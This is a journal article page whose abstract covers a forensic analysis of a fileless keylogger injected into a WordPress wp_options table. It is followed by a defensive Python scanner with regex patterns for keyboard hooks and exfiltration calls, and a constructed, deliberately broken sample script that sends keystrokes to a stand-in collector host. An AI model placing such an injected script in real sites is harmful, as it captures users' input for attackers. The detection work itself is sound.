Digital Forensic Analysis of Keylogger Attack Evidence on Websites Using the NIST Method
DOI: https://doi.org/10.33394/j-ps.v14i2.19919
Keywords: Digital forensics, Keylogger, WordPress, NIST, MITRE ATT&CK
Abstract
WordPress commands 43.2% of global websites and has become a primary target for keylogger attacks, with vulnerability trends showing exponential growth from 1,543 in 2014 to 8,907 in 2025 according to the WPScan Vulnerability Database. This research employs the National Institute of Standards and Technology (NIST) SP 800-86 method, integrated with the MITRE ATT&CK framework, to analyze WordPress websites suspected of keylogger infection. A comparative approach is implemented by comparing WordPress against the DIABEX website (an AI-based diabetes diagnosis system) as a baseline control. The research uses a qualitative descriptive methodology through the four NIST phases of Collection, Examination, Analysis, and Reporting, extracting historical activity logs covering a 30-day period with Python-based forensic tools. Results identified a database-injected fileless keylogger on WordPress delivered through manipulation of the wp_options table, with MITRE ATT&CK mapping across the Initial Access (TA0001), Persistence (TA0003), Collection (T1056.001), and Exfiltration (TA0010) stages. A comparative security assessment revealed a 53-point gap between WordPress (29/100 - CRITICAL) and DIABEX (82/100 - GOOD), and the finding that 97% of WordPress vulnerabilities originate from third-party plugins underlines the need for comprehensive database integrity monitoring and security audits.
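To illustrate the database-side detection the abstract calls for, the following is an added Python example, not the paper's own forensic tooling: it scans wp_options rows for injected inline script carrying a keystroke hook and an outbound send, tags each hit with the ATT&CK stages named above, and diffs the rows against a clean baseline of row hashes. The sample rows, the baseline hashes and the hostnames are constructed for the example.

```python
"""Scan a WordPress wp_options export for injected script that behaves like a
fileless keylogger, and diff it against a known-good baseline snapshot."""
import hashlib
import re

# Traits an injected keylogger tends to leave in option_value: inline script,
# a keyboard event hook, and a network call that ships what was captured.
SCRIPT_TAG = re.compile(r"<script\b", re.I)
KEY_HOOK = re.compile(r"(keydown|keyup|keypress|onkey\w+)", re.I)
EXFIL = re.compile(r"(fetch\(|XMLHttpRequest|sendBeacon|new Image\(|\.src\s*=)", re.I)

def row_hash(option_value: str) -> str:
    """SHA-256 of one option_value; the unit of the integrity baseline."""
    return hashlib.sha256(option_value.encode("utf-8")).hexdigest()

def scan_options(rows):
    """rows: iterable of (option_name, option_value, autoload).
    Returns [(option_name, [reasons])] for rows that look injected."""
    findings = []
    for name, value, autoload in rows:
        reasons = []
        if SCRIPT_TAG.search(value):
            reasons.append("inline <script> in option_value")
            if KEY_HOOK.search(value):
                reasons.append("keyboard event hook (T1056.001 input capture)")
            if EXFIL.search(value):
                reasons.append("network send from the page (TA0010 exfiltration)")
            if autoload == "yes":
                reasons.append("autoload=yes: loaded on every request (TA0003 persistence)")
        if reasons:
            findings.append((name, reasons))
    return findings

def diff_baseline(baseline, rows):
    """baseline: {option_name: sha256(option_value)} from a clean snapshot.
    Returns names of options that are new or whose value changed."""
    current = {name: row_hash(value) for name, value, _ in rows}
    return sorted(n for n, h in current.items() if baseline.get(n) != h)

# Constructed sample rows (not real evidence): a clean row and an injected one
# whose script is deliberately non-functional (h and d are undefined).
SAMPLE_ROWS = [
    ("siteurl", "https://example.invalid", "yes"),
    ("widget_text", '<script>window.addEventListener("keydown",h);'
                    'navigator.sendBeacon("https://collector.invalid",d)</script>', "yes"),
]
# Constructed clean baseline: widget_text was an empty serialized array.
CLEAN_BASELINE = {"siteurl": row_hash("https://example.invalid"),
                  "widget_text": row_hash("a:0:{}")}
```

Running `scan_options(SAMPLE_ROWS)` flags only widget_text with four reasons, and `diff_baseline(CLEAN_BASELINE, SAMPLE_ROWS)` names the same row as changed; on a real export, regenerate the baseline from a trusted snapshot rather than from the suspect database.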
License
Copyright (c) 2026 Arizona Firdonsyah, Dimas Rizki Setyaji

This work is licensed under a Creative Commons Attribution 4.0 International License.
Authors who publish with this journal agree to the following terms:
- Authors retain copyright and grant the journal right of first publication with the work simultaneously licensed under a Creative Commons Attribution License that allows others to share the work with an acknowledgement of the work's authorship and initial publication in this journal.
- Authors are able to enter into separate, additional contractual arrangements for the non-exclusive distribution of the journal's published version of the work (e.g., post it to an institutional repository or publish it in a book), with an acknowledgement of its initial publication in this journal.
- Authors are permitted and encouraged to post their work online (e.g., in institutional repositories or on their website) prior to and during the submission process, as it can lead to productive exchanges, as well as earlier and greater citation of published work (See The Effect of Open Access).